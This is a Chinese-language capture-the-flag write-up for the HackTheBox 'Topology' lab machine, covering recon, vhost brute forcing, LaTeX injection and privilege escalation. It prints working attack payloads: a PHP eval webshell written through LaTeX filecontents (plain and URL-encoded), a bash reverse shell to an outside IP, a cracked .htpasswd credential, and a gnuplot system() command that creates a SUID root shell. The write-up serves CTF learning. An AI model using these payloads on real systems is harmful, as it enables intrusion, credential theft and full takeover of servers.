Nmap

┌──(root💀kali)-[~]
└─# nmap -A 10.10.11.217                                                      
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 22:39 EDT
Verbosity Increased to 1.
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE: Active NSE Script Threads: 1 (1 waiting)
NSE Timing: About 93.75% done; ETC: 22:40 (0:00:00 remaining)
Verbosity Increased to 2.
Completed NSE at 22:40, 7.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:40
Completed NSE at 22:40, 0.00s elapsed
Nmap scan report for localhost (10.10.11.217)
Host is up (0.18s latency).
Scanned at 2023-06-11 22:39:04 EDT for 73s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 dcbc3286e8e8457810bc2b5dbf0f55c6 (RSA)
|   256 d9f339692c6c27f1a92d506ca79f1c33 (ECDSA)
|_  256 4ca65075d0934f9c4a1b890a7a2708d7 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

经典22 和80 端口

添加/etc/hosts文件

网页上发现别的子域名

vhost 爆破

┌──(root💀kali)-[/home/kali/hacktheboxtools/machine/topology]
└─# gobuster vhost -u http://topology.htb --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100

这里爆破到了一个dev.topology.htb的域名

latex.topology.htb

这个域名下面的应用可以利用laTex表达式生成pdf文件

比如输入 \frac{x+5}{y-3}

就生成了对应的pdf图片，起初很懵逼不知道该怎么做后来搜着搜着看到了

Refer-HackTrick:https://book.hacktricks.xyz/pentesting-web/formula-doc-latex-injection#latex-injection
Refer-github:https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
存在laTex表达式注入

试试最简单的文件包含

发现被ban了

鞭策gpt获取latex语法

发现

\begin{filecontents}{myfile.txt}
Hello, World!
\end{filecontents}

这个语法可以写入文件，该站点又是php写的尝试写一个马

\begin{filecontents}{someb0dy.php}
<?php @eval($_POST['cmd']); ?>
\end{filecontents}

url编码

%5Cbegin%7Bfilecontents%7D%7Bsomeb0dy.php%7D%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%5Cend%7Bfilecontents%7D

但是发现好像没有写入成功，呜呜写了好久写不进去-_-，继续鞭策

修改后的webshell

\begin{filecontents*}{someb0dy1.php}
<?php @eval($_POST['cmd']); ?>
\end{filecontents*}

url编码

%5Cbegin%7Bfilecontents%2A%7D%7Bsomeb0dy1.php%7D%0A%3C%3Fphp%20%40eval%28%24_POST%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%5Cend%7Bfilecontents%2A%7D

终于写进去了,写了一天的webshell - -服了!!!老6

反弹shell

bash -i >& /dev/tcp/10.10.16.8/4444 0>&1

拿到了一个www-data用户权限的shell

/var/www/dev/.htpasswd
这里看着像一个密码文件

vdaisley:$apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0
尝试解密

username	password
vdaisley	calculus20

dev.topology.htb

image.png](https://cdn.nlark.com/yuque/0/2023/png/33561677/1686572220412-bb26728a-5689-43df-bb0b-0c3c2d188c98.png#averageHue=%23f9f9f9&clientId=u4ea9d6a6-ecf1-4&from=paste&height=714&id=u395b224b&originHeight=982&originWidth=1792&originalType=binary&ratio=1.375&rotation=0&showTitle=false&size=113268&status=done&style=none&taskId=ufe8257e8-96ae-43b8-81c0-7c9a1670cb2&title=&width=1303.2727272727273)![image.png

尝试ssh 成功登录

Root

可以看到find /opt/gunplot -name *.plt -exec gunplot {}
这条命令意思就是在/opt/gunplot这个目录下搜索 *.plt的文件
然后作为gunplot的参数执行
Refer:http://www.gnuplot.info/docs_4.2/node327.html

system “命令” 这样可以执行命令

-bash-5.0$ echo "system 'cp /bin/bash /tmp/someb0dy;chmod u+s /tmp/someb0dy'">someb0dy.plt
-bash-5.0$ cp someb0dy.plt /opt/gnuplot/someb0dy.plt
-bash-5.0$ ./someb0dy  -p
someb0dy-5.0# whaomi
root

Topology